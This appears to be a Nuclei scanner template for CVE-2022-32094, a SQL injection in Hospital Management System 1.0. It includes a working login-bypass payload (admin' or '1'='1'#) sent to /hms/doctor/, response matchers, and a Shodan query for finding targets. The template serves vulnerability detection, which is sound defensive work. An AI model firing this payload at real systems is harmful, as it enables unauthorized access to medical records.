55 lines
1.9 KiB
YAML
55 lines
1.9 KiB
YAML
id: CVE-2022-32094
|
|
|
|
info:
|
|
name: Hospital Management System 1.0 - SQL Injection
|
|
author: arafatansari
|
|
severity: critical
|
|
description: |
|
|
Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32094
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-32094
|
|
cwe-id: CWE-89
|
|
epss-score: 0.01144
|
|
epss-percentile: 0.83164
|
|
cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: hospital_management_system_project
|
|
product: hospital_management_system
|
|
shodan-query: http.html:"Hospital Management System"
|
|
tags: cve,cve2022,hms,cms,sqli,auth-bypass
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /hms/doctor/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
|
|
|
|
cookie-reuse: true
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<title>Doctor | Dashboard</title>'
|
|
- 'View Appointment History'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100dc7947c2ea5165ce6949b807b6d186846dc668421f9758a4033ae4891741479e0221009aeae1926a480bf3c4e913e670ddd896d8862c6019410c0425cba16925c575c9:922c64590222798bb761d5b6d8e72950 |